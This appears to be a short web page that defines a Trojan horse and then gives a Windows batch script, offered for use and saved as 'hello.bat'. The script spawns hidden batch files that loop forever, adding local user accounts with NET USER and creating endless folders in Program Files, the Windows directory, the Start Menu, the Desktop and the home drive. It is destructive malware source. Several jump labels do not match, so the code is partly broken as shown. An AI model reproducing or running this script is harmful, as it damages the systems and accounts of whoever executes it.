Trojon Horse Code

A Trojan horse, or Trojan, in computing is a generally non-self-replicating type of malware program containing malicious code that, when executed, carries out actions determined by the nature of the Trojan, typically causing loss or theft of data, and possible system harm. The term is derived from the story of the wooden horse used to trick defenders of Troy into taking concealed warriors into their city in ancient Anatolia, because computer Trojans often employ a form of social engineering, presenting themselves as routine, useful, or interesting in order to persuade victims to install them on their computers.


GOTO start

@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

CD %HomeDrive%\
SET lisa=1
GOTO flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1

GOTO flood1

Save it as hello.bat


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